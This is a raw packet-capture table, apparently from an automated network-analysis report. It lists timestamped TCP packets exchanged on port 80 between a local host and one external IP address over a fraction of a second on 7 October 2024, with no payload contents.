Oct 7, 2024 03:15:37.364028931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364047050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364052057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364070892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364088058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364089966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364104986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364120960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364125967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364142895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364156008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364160061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364176035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364191055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364198923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364221096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364227057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364245892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364249945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364262104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364279032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364283085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364300013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364310026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364314079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364347935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364367008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364542007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364589930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364605904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364619970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364645004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364650965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364670038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364671946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364695072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364696026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364710093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364713907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364732981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364763975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364768028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364798069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364830971 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.364989042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365017891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365051031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365071058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365103006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365108013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365153074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365155935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365205050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365207911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365237951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365262985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365288019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365288019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365324974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365340948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365361929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365377903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365415096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365417004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365447044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365468979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365495920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365499020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365529060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365547895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365561008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365581036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365595102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365611076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365628004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365648985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365659952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365678072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365689039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365710974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365721941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365742922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365756035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365773916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365788937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365803003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365822077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365843058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365854979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365880013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365891933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365906954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365920067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.365946054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.365969896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366266966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366300106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366333008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366352081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366374969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366384983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366415024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366422892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366444111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366472960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366528034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366528988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366563082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366581917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366620064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366643906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366674900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366695881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366708994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366724968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366741896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366760969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366775036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366792917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366806984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366837978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366841078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366853952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366873026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366904974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366911888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366945028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.366967916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.366978884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.367007017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.367012978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.367043972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.367047071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.367065907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.367100000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.385705948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.385735989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.385780096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.385787010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.385837078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.385854006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.385885954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.385901928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.385921955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.385924101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.385947943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.385955095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.385971069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.385989904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.386009932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.386046886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.387597084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.387731075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.387762070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.387797117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.387799025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.387831926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.387834072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.387866020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.387871027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.387893915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.387901068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.387914896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.387933969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.387957096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.387995005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436086893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436144114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436194897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436206102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436229944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436239958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436265945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436274052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436295033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436306953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436337948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436341047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436357975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436372995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436394930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436407089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436430931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436439991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436467886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436472893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436502934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436506033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436537027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436539888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436558962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436574936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.436598063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.436630011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.454596043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.454701900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.454756975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.454792023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.454826117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.454859018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.454895973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.454937935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.454937935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.454937935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.455120087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.455600023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.455691099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.455724955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.455761909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.455794096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.455794096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.455794096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.455813885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.455817938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.455864906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.455868006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.455916882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.455919981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.455986977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.455988884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456021070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456048012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456056118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456075907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456089020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456130028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456145048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456182003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456187010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456216097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456238031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456249952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456269979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456302881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456302881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456335068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456362009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456384897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456392050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456424952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456449986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456459999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456476927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456492901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456511021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456526995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456548929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456559896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456582069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456593037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456617117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456625938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456645966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456660032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456681967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456700087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.456712961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.456754923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457313061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457366943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457372904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457398891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457420111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457433939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457449913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457485914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457529068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457561970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457587004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457597017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457612991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457648039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457773924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457834005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457890987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457923889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457948923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457957983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.457973957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.457990885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458009958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458043098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458045959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458079100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458093882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458131075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458132029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458164930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458180904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458220005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458220005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458273888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458281040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458307028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458331108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458340883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458359003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458395004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458400011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458451986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458456039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458504915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458513975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458545923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458570957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458595991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458599091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458628893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458646059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458663940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458679914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458697081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458719015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458750010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458751917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458801985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458805084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458851099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458856106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458885908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458905935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458924055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458940029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458956957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.458977938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.458991051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459014893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459022999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459055901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459059000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459079981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459088087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459105015 CEST	49782	80	192.168.2.5	95.164.90.97
